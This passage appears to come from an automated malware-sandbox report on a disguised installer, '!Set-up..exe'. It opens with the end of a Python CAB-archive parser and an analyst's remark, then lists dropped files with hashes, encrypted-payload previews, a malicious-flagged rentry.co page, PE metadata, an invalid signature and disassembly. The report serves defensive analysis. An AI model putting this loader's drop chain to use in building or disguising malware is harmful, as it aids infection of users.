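        cffiles += struct.pack("<IIHHHH", len(data), off, 0, 0x5A21, 0, 0x20) + name.encode() + b"\x00"
        off += len(data)
    coff_files = 36 + 8
    data_off = coff_files + len(cffiles)
    header = b"MSCF" + struct.pack("<IIIIIBBHHHHH", 0, data_off + len(cfdata), 0, coff_files,
                                   0, 3, 1, 1, len(members), 0, 6536, 0)
    folder = struct.pack("<IHH", data_off, 1, 1)  # one CFDATA block, typeCompress 1 = MSZIP
    return header + folder + cffiles + cfdata


SAMPLE_MEMBERS = [("Fwd", b"#include <stdio.h>\r\n" * 40), ("Designed", bytes(range(256)) * 8)]

if __name__ == "__main__":
    cab = build_sample_cab(SAMPLE_MEMBERS)
    info = parse_cab(cab)
    print(f"{info['cabinet_size']} bytes, {len(info['files'])} files, at {info['files_at']:#x}, ID {info['set_id']}")
    for f in info["files"]:
        got = extract_member(cab, f["name"])
        print(f"  {'+A ' if f['archive'] else ''}{f['name']!r} {f['size']} bytes -> {len(got)} extracted")
```

Listing the directory first is the point: the member names, sizes and which process is expected to consume them can be matched against the extrac32.exe drops above before anything is inflated, and the checksum field is deliberately ignored here because a CFDATA checksum of zero is legal and a wrong one is not evidence of anything beyond a corrupt block.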
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):117760
                                                            Entropy (8bit):5.977012621747547
                                                            Encrypted:false
                                                            SSDEEP:1536:OxjgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ22:OxjgarB/5elDWy4ZNoGmROL7F1G7ho22
                                                            MD5:D036147EA7B09A642723D8811105937D
                                                            SHA1:276CC8C1DDA5D55F549E053522F95CEE037F6B9D
                                                            SHA-256:DC830AFFB9D9B2E23293BEDA376AD0BDA96CDFF3670CD10ACD131FDCC795855E
                                                            SHA-512:B23E9E6A86720D1E37399916F66A13612CA570884D84F89383563E30479C37F6D48FB0859220F027E68A29D568B5AF78360112C06EE89BA347145E9AB48F3CF5
                                                            Malicious:false
                                                            Preview:..F...N...d...z....................................".......:...N...h...x.................................... ...4...P...b...t.........................n...............*...>...T...p....................................(...@...P...^...t................................&...B...`............................. ...8...J...\...r..................................."...*...@...N...Z...n............................V...J...:...*........................................................*...<...V...l...x...........................................(...2...D...V...f...x....................................... ...2...D...^...x..................x...^...H...2....... ...........................................'...........%...).......................................M...&...........................................h...R...>...(....................................... ...6...F...V...h...v....................................,...:...J...V...b...v.......................................*.
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):109568
                                                            Entropy (8bit):6.268600966580074
                                                            Encrypted:false
                                                            SSDEEP:3072:GZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3lap:GK5vPeDkjGgQaE/lS
                                                            MD5:CD16A7A04781F568A2EC3AC1A39FED9C
                                                            SHA1:37096520C4625AA474494B9C2A10BF31DE8B673D
                                                            SHA-256:5863794AC1CC6542B2BEE5E8A5CF372C386DB7F2840295B902B1E3B88751A9B6
                                                            SHA-512:6FB5658A18742FE5428A89E06E7EC0B3AE07658329CDA5FB8F0801356648D992A9C11F9E26D2468E7153665C8F3D626151256336617037B7B5F6BF3B0ED6777A
                                                            Malicious:false
                                                            Preview:.......................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F..
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):79872
                                                            Entropy (8bit):7.997843169471513
                                                            Encrypted:true
                                                            SSDEEP:1536:SohxbClN1Bzx9wpidSop7s9FJ8ejlM+wd/zJP7vxugTGMOZ1e:SoraBzPPdS/9XfwpzJP7Jugqj1e
                                                            MD5:CC9CC6F20A1EA21EA470B504FDE0F90C
                                                            SHA1:1E7AFADF12F7A09A68C93BA813C64C2C9B225E71
                                                            SHA-256:2F9D2D953CCFEDDD5DEC2DF0BC5134F002F44F31715BD812F81875CDF6B550A6
                                                            SHA-512:64C4E6ED40C401BF82ADE85189E7E862F7817965F2739FB7C93B7C2A6FD4B4959585BAF05EEB1E4A21E5F665E64709C3FA670AAE5CA1EE2B7927E7FE1E4D3824
                                                            Malicious:false
                                                            Preview:B....L1....=...g...........P.... @....p.,.-..NgP....k....+b...q6I.W.h.3...._z.E.....Ny.P00......4..v.OGE..N_.,.*Q\_m..w.K.....Avb..QW....)>...]..E...#.>..}.......Z/...._...(b.f..F..D......|j.87.....UT.m<....lA.n Ux......7...4...!L....Ie...nC..i.}..#....NS.;.U...|.jO...........1.(..!.......n .."...T.t....Y.X.H......350K...wla.e...d......<.J`.{.]b......O%.S..|r...o'Z.|.E.>.u.......Gm.9.2o^r.Lc.9...I4.K.q.^*......"L.X.`|.1..1.B-.^G`.(FO+..#s.2..V...W.e&....8.L.,|.?....?.+.......-..}.!(@$F./....7..(I.-v...x....z.F......ZO..t...+1......o@.*..s_.Ve.IUK...a. .A..Q:.e_.Kn.R[>W.@.....5...^...g.......h9.|......%.g....+....K._(2............t.R..^.Q.BR...%....8=.Z....i<Py....c..... P_.'..h.*...A].wi\..Z... .K......1....a...c..1.3....lJ=...@.Rc.on...W.o.....a.R0....m*|(o.c...|....GT.ga.....J..e..`......S\..f...D.}..z>9.....D....H..[7> ....3............'=:G..S$qOI.?.....pCg..25.')y...P....s....;.9v.%5..n;.%-..Te...Z..&.....D..!............0b..,...Y....^..
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):105472
                                                            Entropy (8bit):5.077087329848572
                                                            Encrypted:false
                                                            SSDEEP:768:xhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUs6:eaAwusPdKaj6iTcPAsA+
                                                            MD5:B99AD1F5C7742F52686D2508FD00982A
                                                            SHA1:7B0449CADAF6A2A28DBF7E65FD45A1FD12EDDB48
                                                            SHA-256:AC58BF2BC9334DD912148161F79DC611A7326465CF959F7374F387E8AFC61B42
                                                            SHA-512:78397576FA9CD90C7B8EA8ECE2F5B31887F5E5EB6D5A3C6FB69E4BA2554B14286142D68DB2F6DEEC4C21AD28B8148A89494154F65CE36F24EEA793EB3D96F472
                                                            Malicious:false
                                                            Preview:......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!...~...!...+*..!...]...!...(*..!...?*..!...=...!...E...!...G...!....*..!....*..!....*..!.......!...2...!...3...!...6...!...5...!...O...!...K...!...1...!...(...!...D...!.../...!...-...!....)..!...A...!....)..!...+...!...*...!....)..!...&...!...*...!.......!...'...!.......!...%...!.......!...................................t.......................................................t.......&.......%.......@.......?............... ......" ......; ......& ....... ......3 ....... ....../ ......7 ....... ......+ ......C ..............................".......;.......&...............3.............../.......7.......................+.......C...............................".......&...............+......./...............................3.......7.......................&.......;........................~.......P....... .....................................................................
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):895
                                                            Entropy (8bit):3.529004704992108
                                                            Encrypted:false
                                                            SSDEEP:12:oLOyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:oiyGS9PvCA433C+sCNC1
                                                            MD5:9FA6250AC33B492A0812FC44C12A8A0C
                                                            SHA1:B4277E0D18E4FDB16B4437F0803BB6E04438A162
                                                            SHA-256:26A3D1D787256EDD456A7E86452AD615AD8AEA98C58F8ECEA9EE4978F62D02DE
                                                            SHA-512:FFE0CD06A9BD86E673A0D92E3C7FB87A2E50A80B40C4716EE224264F9BE8A4E32F78E86F38E38156AD40CA8D987537CB65B9B9DDA86BFEF2FDBB9AD0CB836E52
                                                            Malicious:false
                                                            Preview:Ratio........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):62464
                                                            Entropy (8bit):6.691860814252206
                                                            Encrypted:false
                                                            SSDEEP:1536:82U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv+G/UXT6TvYd:82UDQWf05mjccBiqXvpgb
                                                            MD5:85667E167580AB6EE879A397EC8378D5
                                                            SHA1:3C22100369DD7E9FC15788182A7647CC18A12EC8
                                                            SHA-256:FAB0E8057B43711FDCF24AB3BB355B5CBC3F3D37782E598BF4925AB58E602E74
                                                            SHA-512:398C52BEC5B244353715BC4A044415DB5A542BB9EF8C98D4C425BAEA55E2BDC0946753C5AE1775A950FB1FC2F2F3119243178D58F3230873A77086BB4FFF31D4
                                                            Malicious:false
                                                            Preview:f;E.u...u4IG..f..A..v...f;E.t.f;E.t.f;E.u...._^[..F.r...N.l.....t...U..QQV...E.....3..E.W....tn.....FP.P...Y..ua..3.S.]....V....+tVH...tLf9.Vt....VP.h...Y..t.k.....E.....V.....B..3...f9.Vu....M..E...[_^..2......M..B...U..Vj.....D..Y.u........F....F.....^]...U....SVW.}...3.j.A.G.[.M..@.f9X...V......e....d....;.........m.....h.............:.t...uY..:.t...uS..:.........uI..]...;Z.~L..u>..;Z..A.U.B.U...u1.M...d....@...;...H..._^[.....P0.P0.P0.P0.@0..j.h.....:...U..Q...SVW.13.....M.x>..>.+....S..s...0.u......YY..x.~..{..M.;.~.;....._^[.....s.......V..~..t..~..Wu..~.........F.._.N.^.N..y...t.Q......~..F....V...(..j.V.=C..YY..^...U..V..W.F...........}.S..........j.[9_...4..................[.N.....4..._..^]...U..QSVW...G...................u?.u..~....O...j.Y9N..........6........../...O..........._^[.......................M...U..QQV..~..t..y......]..'...E....F.....^..U....SVW..M.h..I......u..F....x........j8..B......$.....'..>B..Y..G..c....O..#......T....F..0...]..
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):7.996655669830848
                                                            Encrypted:true
                                                            SSDEEP:1536:VklthqG33QEqywJCsrUvekJ9dVLw45uRY4hUfrR:V23AEVwEfJ9XLw45riUfrR
                                                            MD5:76D9165FFF95E5302786C486398E284B
                                                            SHA1:ABE552EE6A06100D96AEFC6F2AF6E189AA766227
                                                            SHA-256:1B5A2E903DEC1BD0620E473D0DFF69761ACF5E375EAC1ED87ADF76F36F2386A3
                                                            SHA-512:6CC547E452FDA1A60FBFB016027791788B23C3591114D7800B244ABA620717DF5A72B5CA1C98AA1355CA2C8B0E7395C04EC072DB9606540051FD99B1846FB198
                                                            Malicious:false
                                                            Preview:.N...9.yHi..>..d.W.Xd8.r..M...%.*|.......ig.]}>...l.T..d.7.6..$..L.......Gv5.1._x...1l..X....y....>...9.B%{...ZZ..y.K}...=..l..]..T.....o.j..t.q....B..H...|n).KY.5..U.u.B..!.Z.*.....z(|.B.zz8..N.M....0)FF[R.32A..n...W/........!..+Q..{S.:07:.c|.\NK..R.!.v_...Ye.J.lPg..=mju....".`.....X.|.)Np..p..S......Q.`.OT..A..&....>........,..'......4$.x.c|.].D..=*..&+#D...~g...%q....V..........v`..E.~.q..}}r...wi...iB uG..T..[.|%.#-.XG^....ED.....u:*.vOP.:.....`>{.:....+q..}.....pz..Ct..6-.I...a].D.c.....V.0...=}sQ.ig..!A...."k.f.D..G....&.&.Q..+.M.....`.O....s...._Q..j.x...9.ld.....G9......<W.[.Bi...6....+I+W....0R6d.jh?..qe.......a..k.".....__....$..3..<........C}..l...a..=Xf..?.2"..V..d....+02..s.s(L. *7...W*..5Yj)bZ.T..S..Q........D.7IzZ~f7.uy.9k+.....>.^...}%....;.Vc.!.-.0..T...j..E.....HP;..-=H.Z...f.J.*Z...i?...l..?A..i.a.`LFo.w...JU..a .6.l.O....G.........Y..K.....X..+..D...A$....^.`..).2j,...+*.-$.}.G....H.w.<.. ....a qR.....?.[..S.%JE.6
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):144384
                                                            Entropy (8bit):6.466063523256831
                                                            Encrypted:false
                                                            SSDEEP:3072:PDoioO5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbI:GO5bLezWWt/Dd314V14ZgP0JaAOz04pC
                                                            MD5:57B6E79E7402D37A0B83CFF2DB1D0273
                                                            SHA1:8805DF3CABF590F92B2ECB7EFAE60D82F14F0B6F
                                                            SHA-256:8DF20B2B819AA0C6E36877BA7063FED41274B988C46C28EC7E4B3C72584EC2E7
                                                            SHA-512:49EAFE0D09F850C52006C3DF4DD58E2D4CE1D6AA22AA7A378D6345AB6FE7C92987E134E4C486DEF75E6B0219D867AE1229AA828440C5624EF8C93C7CC1E79DAF
                                                            Malicious:false
                                                            Preview:...Pj..t$\Q....I...tF...@..|8...L8.t..I8.A......|8...L8.t..I8.A...|$.........t$.....I......C..L$$3.SSQS.L$0Q.t$<.H.....HP.t$0....I...t(...@..L8.8\8.t..I8.I...L8.8\8.t..I8.Y....M..D$(P..M....S.t$(.H....(....t$..5..I...9\$.t..t$...L$P......L$0.%....L$@......D$,.(.u.j.P.8...t$0..8....._^3.[..]...U......LSVW.}...h..I....B....L$8.....L$(.....L$H.....E..@..0........N..........A..B..A..B..A..B....D$XP.D$<P.D$PP.....D$(.......D$<.A..D$@.A..D$D.A....D$0P.D$,P......u1...@..|....L..t..I8.A......|....L..t..I8.A...l...3..D$.9D$<t].D$.P.t$..t$@..$.I...t@j.P...H.........H..|....D..t..@8.@......|....D..t..@8.@........L$....L$..D$.P.D$$.....P3.P.t$TQ....I...tRj.P...H....O....|$..t..t$.....I....@..|....L..t..I8.A......|....L..t..I83..A......E..@..p....K....F..L$.Q3.L$ RQR.0.t$$.. .I...j.^..1...t6j.P.......H..|....D..t..@8.H...|....D..t..@8.@.......3.P.t$ ....D$.........j.Z;............h...;..........t`..........E..D$......@..p........D$.P.D$$P3.PP.F..0.t$$.. .I..]...t$ .|$$.A...j.X
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):71680
                                                            Entropy (8bit):7.997185886941614
                                                            Encrypted:true
                                                            SSDEEP:1536:bvgT0gwThL3g9hMNG6HNnBAcmSJU3VXkxf3nZ9rY47K0qMLE9S7f:bvgABhL32wHNn6cBgX+brY47K0qqtf
                                                            MD5:34BE2CF79F42494DB963EC85DA206D2E
                                                            SHA1:2713983B0B393CFF8E07630B1ABC107FE90BDC5B
                                                            SHA-256:7CFB013FACCD6086F660D5B46712EBACABF2A160A26E453A7B83D83412A16A11
                                                            SHA-512:47CD4E47A69059235607B95342E069CCD7C8E41F7D6D9E1DDC9BF5F93BC8C7A064A49EDC26ADC41CCD3F24B5515E965D3E9CAAC391D345D3D5209C6ADEDD61CB
                                                            Malicious:false
                                                            Preview:E#....p.C...d.....7%y.~0~.|...1....o.|.....}(..7...3.....8.0..|.....j$.e.....p......jn.W..U.hJ.Ei...}...B.Y.F.kt.E...n.H@*...O.G8...x.].^b.P.3....J..V.J...;.~.....0;.....`\"G...@;..t...Y........u.8.sY..d.b...1b..p...O....M KL3.TqH-J.k......\..f..%|p.k...-1._.M@ll.l..Z....W..?...w..*....V..t..2I.......V.Z....H.NPa.$.e7OE.1.._...^..........N.... (.PN....33.7......<"E!.E..........*."Q..;..C../............_m...H.j...\...O0&,Z.B..)..).H.8=.E.,..1...HCtGG.BC.*..3.="./...4z....r..q.kQx.DE.......u2;R....e.......%.t...v.B.X..8}... ..D.....g..H.........D...K.C..RPPgbtX*....A.%...E..s....8..MG(.....v..g.v,..J.v9.)cv.....y.n...N.n|...xE..&.%oz....W....E'/Y..............^...., V...5.k...dj.......}.9xP}\.R..S.q....L.t=.<...b. D...Q...<..',.v.I.....,.Cjq.....]f1.m.+..@...i_ {..J..T.:U....t>.&}..G..@.9....G.FH.K.Y...K(.".'#.......$.........urd.o}*..E..;..5.p...s..@../.w#...my......@....;......e...1.8.p..X..9.v.Q...I...O...._...d..&...N..{.hB....g....o...x.
                                                            Process:C:\Users\user\Desktop\!Set-up..exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):34424
                                                            Entropy (8bit):7.994339551631228
                                                            Encrypted:true
                                                            SSDEEP:768:VCFeeq+5DGzH8CfNr7GfSLnANmqrfy10Uy/hrMBohg9:VCFeeQBlr7GKzaXy0UyZrK
                                                            MD5:F0067E491667E285C6AA36CABB0934F0
                                                            SHA1:05F07BC57272ACEA6794F92726B6B05AC4BF41EA
                                                            SHA-256:7C27FA3805B5877F74A80274B3ACCFF8041CFCB5C8FF930DE5B93F49569A9C8E
                                                            SHA-512:FFDAD8684222F1E957A8E64DF94EE6DEA74BE948E8ABA9C759B5995B8337A9C1F363C1B098D32C393DC69D7470C9BA2E748E4D057F3FE89E6F4C99B02DE2F9AF
                                                            Malicious:false
                                                            Preview:.<]......].....F.`..E........!......Fz....`Ey.Z......c.........]...@...8..(..[.(..iR.G..*,...0.d......[...D32...x.=..7y;.=#..3{.:.Af.F.8,C:..b....[..<4....P..P....a.9?.l1D..A...JU8...T.kYXY.....U2...0...A..7<......;...jS.......}9_.....k.n....e.....Z...t<V.....Z...y...|1i.,........d.3...YN..[x. .y-.i.z.D........3..Q.......j..BH....C.....)zyg"..Y..[wG+..+..''`.9..5:Y{r.8H5..4.rXuC#F......g..._-.Z(.....,.>..P]..bD..2s........wU......5......5i..Xg..\%..*cr5e..+...(=./...-Z.y..M.@..@..;..9.Z:..j.......ju*..e;..#......X...t.S....5......Iva*...!...q..{..N.H.*.s...kYp...h9...>f.{%.}....|.....b}]...O...Rcm.K. q. 51...-.?....>.{.:.($...)E......h../f.R1...`.u.m`..o....=YmAV...mR(!.$.j$...9.~.C5.CZ...h. 4..r.."{.U..}Hb.s)._..q.j.3..Y.VI:...*..g.}...^.vY#....#.......r..)........9nnQ.-.'F....._.....Z.6......GN...[..E.z.R..g...D..z...........9W...(c\g.E.=..*5L..Uq....O0.....54.3....U3D..D..{...c..%......J.Rf...t.....Eg.....8|.Y.n.j#."..d.w....u..d.Y..S>.
                                                            Process:C:\Windows\SysWOW64\extrac32.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):7390
                                                            Entropy (8bit):7.597721493375944
                                                            Encrypted:false
                                                            SSDEEP:192:bH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:brVEVFJ8ZcGwGBk7/UMQ3rw
                                                            MD5:117FE1670C955271C9D468192301A43F
                                                            SHA1:46E5D4E2284C95B30D8D5C8C506A5376987B70A6
                                                            SHA-256:4C4FD142141A03A04B927A31F365DFB0ACD6F972340B109430AF367EAA2856ED
                                                            SHA-512:1BECFB8DDE3672C2A6FBD33BE641CD0E15852365AD2DEED41700F3C441BE90F691B564AE947813A04D19665E9B39AC17F73B1A7EFB54CE8B4821B0A25D2DCEF9
                                                            Malicious:false
                                                            Preview:d...H*}.)..f..+....";Y.}..#....). .%|.X.[.....tgo..!sN....9v.\...|.)F.....1.I4V(F.......x.t.2.............T.Ia.S..&zp2....5..U..ye.{.$.;..!.f...E...1..70..3...0j0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G3..8.Hn...04.J0...`.H.e.........0...*.H......1...+.....7...0...+.....7...1.0...+.....7...0/..*.H......1". .g.6..l....#..t.X..n|$>.......0^..+.....7...1P0N.". .A.u.t.o.I.t. .v.3. .S.c.r.i.p.t.(.&https://www.autoitscript.com/autoit3/ 0...*.H............>./.f..m..6.5.f..V..6.......E.]....Q...).S.......A20......|.aH|A..B;.L:..,...<.d>m._.Ij..Fx...2........~,.P.......u.um..S..7c.]..\f....e{W.XM&..*.b.=4..)....C.O).@.....&OX.29\.K.bG..;c-f..:.. .K..u.....O.riW....u5.GU[..zoH.e..i.....0RZ....5....0.....+.....7...1...0.....*.H..........0......1.0...`.H.e....0....*.H..............0.......+.....2..010...`.H.e....... .s....Y....8.z..^.....&.....2...M:BiRb.Sanz...M.....20220227153015Z0.....W.U0S1.0...U....BE1.0...U..
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):0.6599547231656377
                                                            Encrypted:false
                                                            SSDEEP:3:NlllulRlltl:NllU
                                                            MD5:2AAC5546A51052C82C51A111418615EB
                                                            SHA1:14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
                                                            SHA-256:DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
                                                            SHA-512:1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
                                                            Malicious:false
                                                            Preview:@...e...........................................................
                                                            Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            File Type:HTML document, ASCII text, with very long lines (945)
                                                            Category:dropped
                                                            Size (bytes):5659
                                                            Entropy (8bit):5.059430887107316
                                                            Encrypted:false
                                                            SSDEEP:96:5puA5jKEcXrj7uDQgzQs4x3pBxu0knx/ICu:5p9pcXr2DFzd4x3pBIXnx/ju
                                                            MD5:697EB758D2A3D2C71F0857A9B7D0F526
                                                            SHA1:9BE1BE38EC1E38EF0D4F3C04A3BA3DC9A0958A41
                                                            SHA-256:CEA13B090B80DE98292B698298F6AC8CCA8FEDC5F3648FD737F01D28E4EF87AC
                                                            SHA-512:6BA18397D4107C46B4C096FFE2D487868E405619CE730E09C635F143C45CABC12A057A4F339986873C8ADF8D7854F3D830CE2FDA3FFD3354D273CD006AF6D7D3
                                                            Malicious:true
                                                            Preview:<!DOCTYPE html>..<html>...<head>. <meta charset="utf-8">. .<title>What</title>.<link rel="canonical" href="https://rentry.co/what" />.. .<meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and editing. Fast, simple and free.">.<meta name="keywords" content="paste, markdown, publishing, markdown paste service, markdown from command line">..<meta name="twitter:card" content="summary" />.<meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." />.<meta name="twitter:title" content="Rentry.co - Markdown Paste Service" />.<meta name="twitter:site" content="@rentry_co" />.<meta name="twitter:image" content="https://rentry.co/static/icons/512.png" />..<meta property="og:url" content="https://rentry.co/" />.<meta property="og:title" content="Rentry.co - Markdown Paste Service" />.<meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />.<meta p
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):4.9564593876511305
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:!Set-up..exe
File size:14'866'519 bytes
MD5:27968eebcb115c6ecb62199a98ce9ee6
SHA1:7892f28bf31caf505e792268e138210588aa4d8d
SHA256:a124b81ef52d77f88c5b00f0a999482d429602f3cf5a413b3860c2b45909272d
SHA512:60afd0ab796b4f96733b24fb83fe9a4a60833a10e8b2961a3e8fa4b9b29d6ea469fb92bb1161299cc094afcbfcd9db2249dee6ab97840171a41b8917ed648424
SSDEEP:24576:JfK4O0f5F4PCxULgB/88cv15mKLTanYE2caHvdzzfn2eK:3L5gcB/88cDPLT0i9f2eK
TLSH:6BE6C47073FCD079D81608C1EA92B5D39627E6B2B0C3146CA2585EED31B310DBE9DB69
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...N...B...8.....
Icon Hash:41c4d42c79596d41
Entrypoint:0x4038af
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:be41bf7b8cc010b614bd36bbca606973
Signature Valid:false
Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
• 14/06/2024 05:25:33 24/08/2025 02:08:55
Subject Chain
• CN=Nox Limited, OU=IT, O=Nox Limited, L=Beijing, S=Beijing, C=CN, OID.1.3.6.1.4.1.311.60.2.1.2=Beijing, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=911101083302797532, OID.2.5.4.15=Private Organization
Version:3
Thumbprint MD5:DBDA3B2A7B9BCBCB6848546630032BBC
Thumbprint SHA-1:D0E0723E97AFFB6654D2A219076FFAA775A3211B
Thumbprint SHA-256:BC94198163C2DA318A3571ACE8CB7CD8DFAD1C50FD09890C8A3A0FF0557393E1
Serial:3B5F7487FE8960073A53D8C4
Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 0040A268h
mov dword ptr [esp+14h], ebp
call dword ptr [00409030h]
push 00008001h
call dword ptr [004090B4h]
push ebp
call dword ptr [004092C0h]
push 00000008h
mov dword ptr [0047EB98h], eax
call 00007FB82CF0434Bh
push ebp
push 000002B4h
mov dword ptr [0047EAB0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 0040A264h
call dword ptr [00409184h]
push 0040A24Ch
push 00476AA0h
call 00007FB82CF0402Dh
call dword ptr [004090B0h]
push eax
mov edi, 004CF0A0h
push edi
call 00007FB82CF0401Bh
push ebp
call dword ptr [00409134h]
cmp word ptr [004CF0A0h], 0022h
mov dword ptr [0047EAB8h], eax
mov eax, edi
jne 00007FB82CF0191Ah
push 00000022h
pop esi
mov eax, 004CF0A2h
push esi
push eax
call 00007FB82CF03CF1h
push eax
call dword ptr [00409260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FB82CF019A3h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FB82CF0191Ah
add esi, 02h
cmp word ptr [esi], bx

Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ C ] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
